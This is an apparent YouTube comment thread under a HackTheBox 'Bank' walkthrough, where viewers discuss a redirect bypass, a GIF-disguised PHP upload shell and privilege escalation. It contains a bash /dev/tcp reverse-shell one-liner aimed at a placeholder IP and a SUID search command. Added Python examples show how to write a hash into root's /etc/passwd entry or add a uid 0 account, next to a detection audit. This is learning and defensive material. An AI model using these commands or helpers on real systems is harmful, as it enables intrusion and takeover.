you taught me how to cancel redirects, thanks. super helpful!
Quick tip: On the balance-transfer page if you click where it says "size" it arranges the files from smallest to largest so you don't need to wget them.
Woah, why didn't I think of that
Nice video Ippsec, always a fantastic tutorial. Just a note: I clicked Size at 13:59 and it shows the 257kb file; it saves a little time :)
Thank you Ippsec for this Walkthrough. I've learned some new tricks!
Sir, this is Awais Khan from PAKISTAN
Lots of love from Pakistan
Please make a video series on website hacking and hacking methodologies.
We will be really thankful to you ❤️
Thanks for showing the privesc, didn't manage to get that one before it was retired :)
Great stuff. Learned a bunch. Definitely using that python command on NC shells! Did not know that!
Great work IPPSEC thanks for sharing
At 5:20, why didn't you just Ctrl+F the source for timestamp[column delimiter]2?
15:00 could've just sorted it by file size in the webpage 💔
exactly
George O, that was so aggravating to watch, uuuurgh!
I used curl and grep -v
Where can I learn all these commands? I have been studying shell scripting but I still don't know how to write these commands.
thanks for helping me out in solving my 15th box
Anyone else having trouble with the initial command injection at 21:30? None of the commands I run seem to work, I just see GIF89a on the screen and nothing else.
Thanks for the walkthrough. I got stuck at the part where you spawn a TTY shell. I followed all the commands you did, and I was not able to scroll up and down within the shell to view command history. I tried shift + pg-up/down, ctrl + shift + pg-up/down. Still couldn't get it to work. Please let me know what I'm doing wrong. I'm using the default Kali Linux terminal.
You should do the python -c 'import pty;pty.spawn("/bin/bash")' ...... this will give you arrow functions on the shell
31:22 would that work on the other files if root owns 'em??
Nmap result's second line has bank.htb (10.10.10.29). Guessing not required.
Hey Ipp
What did you filter out from the dirbuster wordlist to create the bank one?
Dude these are so cool
Where did you learn all this? You are skilled, bro! None of the courses teach as much stuff as you're sharing with us!
This guy must have worked for CIA
@7Shol I'm from the FBI
@moviesentertainment9623 yea? and my dad is Brad Pitt
Quite right bro, we're all wondering about that 🤨, maybe he's the maker of hackthebox, hahahhhh
After a long time of doing such things you will learn. Takes practice and time.
Hey IppSec,
Could you please demonstrate the Luke Box too ?
Thanks in advance.
Great video, thank you.
30:30 could you please explain more about this command? find / -perm -4000 2>/dev/null
-perm -4000: the setuid permission bit; 2>/dev/null: throw away error messages
Why can't we use 'bash -i >& /dev/tcp/10.0.0.0/8080 0>&1' in this case? I've tried some reverse shells but failed
Hi Ippsec, thank you so much for your video.
I have a question - do we need to import pty, or is it just for comfortable future work?
he does those things to get arrow functions and auto complete on the shell
Great Work Man
Thanks for sharing.. great work...
Thank you so much.
Your job is so amazing, do you have some video of how you navigate through the bash windows?
yes, the tool is called tmux and he made a video about it
The whole video is great, but the last part I didn't understand: how is it possible to change the password of the root user in passwd? I mean, password hashes are stored in shadow and accessed by the OS for password verification, if I'm not wrong, and the passwd file is used for operations like the commands 'ls', 'cat', etc. to verify if a user is in a valid group to list a directory or read a file. So my question is, how can you change a password with the passwd file?
Which desktop environment are you using and how to get terminal which you are using?
he's using tmux for the terminal and he has a video about it
I had a hard time getting the login code for hack the box. Any assist?
I didn't understand this step, and we have to do it (the DNS enumeration)
Shall I do this every time I get the Apache default page as the main page?
Why didn't you try to Gobuster it or something like that?
Can you explain this step for me please? I'm lost here
The DNS enumeration is because port 53 was open. This is where you can do zone transfers etc. As there was nothing more which could be done on that port, move on to the next.
Thanks man.. you are the best :)
the best new trick method
Changing 302 to 200, does this work because of VirtualHost?
No, he just did that so the browser doesn't automatically redirect him to login.php and he can stay on the page he was on. Whenever a browser sees a 302 it redirects to the link specified by the "Location" response header.
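The behaviour described in that reply, as an added example that is not code from the video or from any commenter: a constructed Python stand-in for a page that sends a 302 but keeps writing the protected body, a raw client that shows what Burp sees, and a browser-like client that follows the redirect. The paths, page contents and localhost server are made up for the example; the `/fixed` handler shows the standard remedy (send nothing after the redirect header).

```python
"""Added example, not code from the video or the comments: why rewriting a
302 to 200 in Burp shows a page the browser would otherwise never render.
The server below is a constructed stand-in for a page that sends a Location
header but keeps emitting the protected body; paths and content are made up."""
import http.client
import http.server
import threading

PROTECTED = b"<h1>balance-transfer listing (constructed sample)</h1>"
LOGIN = b"<form>login</form>"


class Handler(http.server.BaseHTTPRequestHandler):
    def do_GET(self):
        if self.path == "/vuln":
            # Bug pattern: redirect issued, but execution continues and the
            # protected content is still written into the 302 response body.
            self._send(302, PROTECTED, location="/login.php")
        elif self.path == "/fixed":
            # Correct pattern: stop after the redirect, send an empty body.
            self._send(302, b"", location="/login.php")
        else:
            self._send(200, LOGIN)

    def _send(self, status, body, location=None):
        self.send_response(status)
        if location:
            self.send_header("Location", location)
        self.send_header("Content-Type", "text/html")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):  # keep the example quiet
        pass


def start_server():
    """Bind an ephemeral localhost port and serve in a background thread."""
    srv = http.server.HTTPServer(("127.0.0.1", 0), Handler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


def raw_get(port, path):
    """What Burp (or curl -i) sees: status, Location and the body as sent."""
    conn = http.client.HTTPConnection("127.0.0.1", port, timeout=5)
    conn.request("GET", path)
    resp = conn.getresponse()
    result = (resp.status, resp.getheader("Location"), resp.read())
    conn.close()
    return result


def browser_get(port, path):
    """What a browser does: follow the 302 and discard its body."""
    status, location, body = raw_get(port, path)
    while status in (301, 302, 303, 307, 308) and location:
        status, location, body = raw_get(port, location)
    return status, body


def demo():
    srv = start_server()
    port = srv.server_address[1]
    try:
        return {
            "raw_vuln": raw_get(port, "/vuln"),
            "browser_vuln": browser_get(port, "/vuln"),
            "raw_fixed": raw_get(port, "/fixed"),
        }
    finally:
        srv.shutdown()
        srv.server_close()


if __name__ == "__main__":
    for name, result in demo().items():
        print(name, result)
```

The `raw_vuln` result carries the whole protected page inside the 302, which is why flipping the status line to 200 in Burp is enough to make the browser render it. `/fixed` is what the server should have done: nothing after the Location header, which in PHP means an `exit;` immediately after `header('Location: ...')`.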
Everything was going great until the corners.gif part. Is that just a text file with gif8 in it? Is it a shell?
He sent an upload of a normal gif, then intercepted the request that was going in Burp Suite so he could modify it. He kept the gif8 part so the server won't block that file and would think it was a valid gif, when actually it was a PHP script to give him code execution on the server.
Thanks for the video! I did it myself first and didn't know a few things, such as how handy the match and replace in Burp could be for this purpose, as well as the other methods to get in. I blindly did php-reverseshell into sudo -l and then checking for SUIDs and then elevating. Should've done more post-exploitation enumeration to catch the other things you found. Could've also created another user with uid 0 in /etc/passwd, having write access, right? As always fantastic vids, keep it up!
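For the earlier question about changing root's password through passwd and the uid 0 idea in this comment, an added example (not code from the video or any commenter) of how field 2 of a passwd(5) line is read and what a defender should look for. The passwd text is a constructed sample; `sha512_crypt()` assumes the `openssl` command-line tool is installed and is only called from the `__main__` block.

```python
"""Added example, not code from the video or any commenter: how the second
field of an /etc/passwd line is interpreted, and the check a defender runs for
the two abuses discussed in the comments (a hash written into root's entry, or
an extra uid 0 account). The passwd content is a constructed sample."""
import subprocess

SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
chris:x:1000:1000:Chris,,,:/home/chris:/bin/bash
"""


def sha512_crypt(password, salt):
    """Produce a crypt(3) SHA-512 hash ($6$...) via the openssl CLI (assumed installed)."""
    out = subprocess.run(["openssl", "passwd", "-6", "-salt", salt, password],
                         capture_output=True, text=True, check=True)
    return out.stdout.strip()


def password_field_meaning(entry):
    """How crypt(3)-based login (pam_unix) treats field 2 of a passwd line."""
    field = entry.split(":")[1]
    if field == "x":
        return "shadow"      # the real hash lives in /etc/shadow
    if field == "":
        return "empty"       # no password at all
    if field == "*" or field.startswith("!"):
        return "locked"      # nothing can match this value
    return "inline"          # the field itself is the hash that gets compared


def set_inline_hash(passwd_text, user, hash_):
    """Rewrite field 2 of one user's line: the abuse a writable passwd allows."""
    lines = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if fields[0] == user:
            fields[1] = hash_
            line = ":".join(fields)
        lines.append(line)
    return "\n".join(lines) + "\n"


def add_uid0_user(passwd_text, name, hash_, home="/root", shell="/bin/bash"):
    """Append a second uid 0 account: the other abuse mentioned above."""
    return passwd_text + f"{name}:{hash_}:0:0::{home}:{shell}\n"


def audit(passwd_text):
    """Defender view: list (finding, user) pairs that indicate a tampered passwd."""
    findings = []
    for line in passwd_text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append(("malformed", fields[0]))
            continue
        if fields[2] == "0" and fields[0] != "root":
            findings.append(("extra-uid0", fields[0]))
        meaning = password_field_meaning(line)
        if meaning in ("inline", "empty"):
            findings.append((meaning, fields[0]))
    return findings


if __name__ == "__main__":
    h = sha512_crypt("Password1", "saltsalt")          # constructed credentials
    print(audit(set_inline_hash(SAMPLE_PASSWD, "root", h)))
    print(audit(add_uid0_user(SAMPLE_PASSWD, "pwned", h)))
```

Authentication through crypt(3)-based PAM consults /etc/shadow only when the password field is `x`; any other non-empty, non-locked value is compared directly, which is why write access to /etc/passwd alone is enough. `audit()` is the matching detection: a non-`x` field, or a second uid 0 account, in a file that should be root-owned and mode 0644 is a strong indicator of exactly this abuse.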
Can anyone give me an idea why
Read up on php system(), or executing shell commands with php. I believe that is the command prompt you are expecting
Hello, thanks for the reply! So I should have said I understood the theory of executing shell commands with PHP, all except the usage of "echo". Most places I was reading didn't have echo in the PHP, just
Yep, the echo was just a mistake. There are like 3-4 different commands that allow PHP to execute shell commands, one of them does not automatically print to STDOUT so echo is needed. System by default prints to stdout in PHP, so the echo there makes it print the result twice.
Thanks again
amazing video
Hey man, now I know you cannot give me the answer but I’ve been stuck on the devel box for a while now. Anyways I have no issue getting a meterpreter, my issue is then trying to escalate privs so I can get the flag. Any helpful hints you could share with me?
You may pick up a trick or two watching my Arctic or Bastard video.
IppSec ah thank you! I'll get to watching those now :) appreciate the help!
Great job, man
Greetings from CS-GO
chris. is an email address, not a DNS name
as usual, whenever I try to use burpsuite, nothing happens and I get zero information
have you set your proxy correctly in your browser?
Cool, really
Where is the flag????
/root/root.txt -- I try not to show flags so you can't just type them in without doing the box.
IppSec yup! Thanks... this was really helpful
30:50 ippsec got hacked haha
How many Indian's are here.... Give attendance 👍👍👍👍
brother am here